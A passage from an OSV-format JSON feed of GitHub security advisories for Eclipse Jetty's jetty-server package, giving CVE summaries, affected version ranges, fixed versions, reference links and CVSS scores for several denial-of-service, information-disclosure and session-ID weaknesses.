If this InvalidPathException is then handled by the default Error Handler, the InvalidPathException message is included in the error response, revealing the full server path to the requesting system.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.11.v20180605" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.10.v20180503", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9rgv-h7x4-qw8g/GHSA-9rgv-h7x4-qw8g.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.3.24.v20180605" } ] } ], "versions": [ "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", 
"9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.23.v20180228", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9rgv-h7x4-qw8g/GHSA-9rgv-h7x4-qw8g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12536" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=535670" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0001" }, { "type": "WEB", "url": 
"https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbst03953en_us" }, { "type": "WEB", "url": "https://web.archive.org/web/20200516001904/http://www.securitytracker.com/id/1041194" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-209" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:29:36Z", "nvd_published_at": "2018-06-27T17:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g8m5-722r-8whq", "published": "2024-10-14T21:08:38Z", "modified": "2025-11-03T23:05:59.283307Z", "aliases": [ "CVE-2024-8184" ], "related": [ "CGA-3v96-9425-c5jg", "CGA-45xv-w77x-56w8", "CGA-4x6r-cwfp-wvmh", "CGA-56m4-5757-c9j7", "CGA-6wch-9rxv-fw5r", "CGA-8cjr-ccm5-q989", "CGA-8vvp-pq4p-2hc6", "CGA-c7jc-pc4g-5wpx", "CGA-c8xx-wqr2-vpgm", "CGA-f4m3-6jhg-xc6m", "CGA-h6g3-pgx4-5qf9", "CGA-hmc6-7f6h-r2jp", "CGA-m9gp-rqph-jfcv", "CGA-p858-c98g-7rp9", "CGA-rgmc-7h79-v9m6", "CGA-vp9g-g9wg-4xpq", "CGA-xj92-8mfm-x22p" ], "summary": "Eclipse Jetty's ThreadLimitHandler.getRemote() vulnerable to remote DoS attacks", "details": "### Impact\nRemote DOS attack can cause out of memory \n\n### Description\nThere exists a security vulnerability in Jetty's `ThreadLimitHandler.getRemote()` which\ncan be exploited by unauthorized users to cause remote denial-of-service (DoS) attack. 
By\nrepeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust the\nserver's memory.\n\n### Affected Versions\n\n* Jetty 12.0.0-12.0.8 (Supported)\n* Jetty 11.0.0-11.0.23 (EOL)\n* Jetty 10.0.0-10.0.23 (EOL)\n* Jetty 9.3.12-9.4.55 (EOL)\n\n### Patched Versions\n\n* Jetty 12.0.9\n* Jetty 11.0.24\n* Jetty 10.0.24\n* Jetty 9.4.56\n\n### Workarounds\n\nDo not use `ThreadLimitHandler`. \nConsider use of `QoSHandler` instead to artificially limit resource utilization.\n\n### References\n\nJetty 12 - https://github.com/jetty/jetty.project/pull/11723", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.9" } ] } ], "versions": [ "12.0.0", "12.0.1", "12.0.2", "12.0.3", "12.0.4", "12.0.5", "12.0.6", "12.0.7", "12.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 12.0.8", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.24" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.17", "10.0.18", "10.0.19", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.23", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": 
"pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.24" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.17", "11.0.18", "11.0.19", "11.0.2", "11.0.20", "11.0.21", "11.0.22", "11.0.23", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.23", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.12" }, { "fixed": "9.4.56" } ] } ], "versions": [ "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.30.v20211001", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", 
"9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.53.v20231009", "9.4.54.v20240208", "9.4.55.v20240627", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.55", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-g8m5-722r-8whq/GHSA-g8m5-722r-8whq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-g8m5-722r-8whq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8184" }, { "type": "WEB", "url": "https://github.com/jetty/jetty.project/pull/11723" }, { "type": "PACKAGE", "url": "https://github.com/jetty/jetty.project" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/30" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00001.html" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2024-10-14T21:08:38Z", "nvd_published_at": "2024-10-14T16:15:04Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-ghgj-3xqr-6jfm", "published": "2018-11-09T17:50:00Z", "modified": "2024-02-16T08:18:50.534710Z", 
"aliases": [ "CVE-2015-2080" ], "summary": "Jetty vulnerable to exposure of sensitive information to unauthenticated remote users", "details": "The exception handling code in Eclipse Jetty prior to 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.2.9.v20150224" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", 
"8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.2.v20140723", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.8.v20150217", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-ghgj-3xqr-6jfm/GHSA-ghgj-3xqr-6jfm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2080" }, { "type": "WEB", "url": "https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-ghgj-3xqr-6jfm" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md" }, { "type": "WEB", "url": 
"https://security.netapp.com/advisory/ntap-20190307-0005" }, { "type": "WEB", "url": "http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html" }, { "type": "WEB", "url": "http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2015/Mar/12" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/534755/100/1600/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/72768" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1031800" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:37:23Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h2f4-v4c4-6wx4", "published": "2019-03-28T18:33:38Z", "modified": "2024-02-19T05:52:03.950097Z", "aliases": [ "CVE-2018-12545" ], "summary": "Uncontrolled Resource Consumption in org.eclipse.jetty:jetty-server", "details": "In Eclipse Jetty version 9.3.x and 9.4.x, the server is vulnerable to Denial of Service conditions if a remote client sends either large SETTINGs frames container containing many settings, or many small SETTINGs frames. 
The vulnerability is due to the additional CPU and memory allocations required to handle changed settings.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.12.v20180830" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.12.RC2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h2f4-v4c4-6wx4/GHSA-h2f4-v4c4-6wx4.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.25.v20180904" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", 
"9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.24.v20180605", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h2f4-v4c4-6wx4/GHSA-h2f4-v4c4-6wx4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12545" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=538096" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-h2f4-v4c4-6wx4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/13f5241048ec0bf966a6ddd306feaf40de5b20e1f09096b9cddeddf2@%3Ccommits.accumulo.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/70744fe4faba8e2fa7e50a7fc794dd03cb28dad8b21e08ee59bb1606@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/febc94ffec9275dcda64633e0276a1400cd318e571009e4cda9b7a79@%3Cnotifications.accumulo.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CIS4LALKZNLF5X5IGNGRSKERG7FY4QG6" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:26Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jg2x-r643-w2ch", 
"published": "2022-05-01T07:43:29Z", "modified": "2024-02-12T16:41:58.146447Z", "aliases": [ "CVE-2006-6969" ], "summary": "Jetty Uses Predictable Session Identifiers", "details": "Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.27" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.1.0" }, { "fixed": "5.1.12" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.1.0pre1" }, { "fixed": "6.1.0pre3" 
} ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6969" }, { "type": "WEB", "url": "https://github.com/jetty-project/codehaus-jetty6/commit/36f81d2e7058b012f6718bc2f1e2786694a8a4a1" }, { "type": "WEB", "url": "https://github.com/jetty-project/codehaus-jetty6/commit/b31f606bf8058a38ab6253aa8dc2dfe6a7f83c78" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32240" }, { "type": "PACKAGE", "url": "https://github.com/jetty-project/codehaus-jetty6" }, { "type": "WEB", "url": "https://web.archive.org/web/20070208112816/http://fisheye.codehaus.org/changelog/jetty/?cs=1274" }, { "type": "WEB", "url": "https://web.archive.org/web/20070602184857/http://archives.neohapsis.com/archives/bugtraq/2007-02/0070.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20121019131825/http://www.securityfocus.com/archive/1/459164/100/0/threaded" }, { "type": "WEB", "url": "https://web.archive.org/web/20200228100052/http://www.securityfocus.com/bid/22405" } ], "database_specific": { "cwe_ids": [ "CWE-330" ], "github_reviewed": true, "github_reviewed_at": "2024-02-12T16:20:55Z", "nvd_published_at": "2007-02-07T11:28:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-m394-8rww-3jr7", "published": "2021-03-10T03:46:47Z", "modified": "2025-09-15T07:42:08.143128Z", "aliases": [ "BIT-nifi-2020-27223", "BIT-solr-2020-27223", "BIT-spark-2020-27223", "CVE-2020-27223" ], "related": [ "CVE-2020-27223" ], "summary": "DOS vulnerability for Quoted Quality CSV headers", "details": "### Impact\nWhen Jetty handles a request containing request headers with a large number of “quality” (i.e. 
q) parameters (such as what are seen on the `Accept`, `Accept-Encoding`, and `Accept-Language` request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application.\n\nThe only features within Jetty that can trigger this behavior are:\n\n- Default Error Handling - the `Accept` request header with the `QuotedQualityCSV` is used to determine what kind of content to send back to the client (html, text, json, xml, etc)\n- `StatisticsServlet` - uses the `Accept` request header with the `QuotedQualityCSV` to determine what kind of content to send back to the client (xml, json, text, html, etc)\n- `HttpServletRequest.getLocale()` - uses the `Accept-Language` request header with the `QuotedQualityCSV` to determine which “preferred” language is returned on this call.\n- `HttpservletRequest.getLocales()` - is similar to the above, but returns an ordered list of locales based on the quality values on the `Accept-Language` request header.\n- `DefaultServlet` - uses the `Accept-Encoding` request header with the `QuotedQualityCSV` to determine which kind of pre-compressed content should be sent back for static content (content that is not matched against a url-pattern in your web app)\n\n### Versions\n`QuotedQualityCSV` was introduced to Jetty 9.3.9.v20160517 and the bug that introduced the vulnerability was in 9.4.6.v20170531. 
